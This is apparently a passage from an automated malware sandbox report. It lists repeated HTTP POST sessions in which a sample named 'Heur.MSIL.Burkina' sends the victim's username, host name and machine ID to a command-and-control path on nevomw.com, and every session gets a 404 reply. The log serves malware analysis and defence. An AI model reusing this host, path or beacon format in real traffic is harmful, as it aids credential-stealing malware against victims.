                                            137 | 192.168.2.6 | 49882 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:47.221801043 CET | 1505 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:47.275233030 CET | 1506 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:47.351135015 CET | 1506 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:47 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            138 | 192.168.2.6 | 49883 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:47.662367105 CET | 1507 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:47.715826035 CET | 1507 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:47.791692972 CET | 1507 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:47 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            139 | 192.168.2.6 | 49884 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:48.086473942 CET | 1508 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:48.138742924 CET | 1509 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:48.211004972 CET | 1509 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:48 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            14 | 192.168.2.6 | 49727 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:48.881874084 CET | 90 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:48.933732033 CET | 91 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:49.007215023 CET | 91 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:48 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            140 | 192.168.2.6 | 49885 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:48.497369051 CET | 1510 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:48.552340984 CET | 1510 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:48.626811028 CET | 1510 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:48 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            141 | 192.168.2.6 | 49886 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:48.930011034 CET | 1511 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:48.983072996 CET | 1511 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:49.073543072 CET | 1512 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:49 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            142 | 192.168.2.6 | 49887 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:49.346885920 CET | 1513 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:49.399409056 CET | 1513 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:49.473378897 CET | 1513 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:49 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            143 | 192.168.2.6 | 49888 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:49.720684052 CET | 1514 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:49.773900032 CET | 1514 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:49.851969004 CET | 1515 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:49 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            144 | 192.168.2.6 | 49889 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:50.131951094 CET | 1516 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:50.186764002 CET | 1516 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:50.264707088 CET | 1516 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:50 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            145 | 192.168.2.6 | 49890 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:50.537655115 CET | 1517 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:50.591460943 CET | 1517 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:50.667494059 CET | 1518 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:50 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            146 | 192.168.2.6 | 49891 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:50.981117964 CET | 1519 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:51.033487082 CET | 1519 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:51.109476089 CET | 1519 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:51 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            147 | 192.168.2.6 | 49892 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:51.500957966 CET | 1520 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:51.554539919 CET | 1520 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:51.629139900 CET | 1521 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:51 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            148 | 192.168.2.6 | 49894 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:51.875500917 CET | 1521 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:51.928212881 CET | 1522 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:52.001681089 CET | 1522 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:51 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            149 | 192.168.2.6 | 49895 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:52.299953938 CET | 1523 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:52.352369070 CET | 1523 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:52.427256107 CET | 1524 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:52 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            15 | 192.168.2.6 | 49728 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:49.288846016 CET | 92 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:49.344322920 CET | 92 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:49.418236971 CET | 92 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:49 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            150 | 192.168.2.6 | 49896 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:52.669431925 CET | 1524 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:52.721806049 CET | 1525 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:52.793745995 CET | 1525 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:52 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            151 | 192.168.2.6 | 49898 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:53.093415022 CET | 1526 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:53.146281958 CET | 1526 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:53.221690893 CET | 1526 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:53 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            152 | 192.168.2.6 | 49899 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:53:53.485192060 CET | 1527 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:53.537513018 CET | 1528 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:53.608858109 CET | 1528 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:53 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
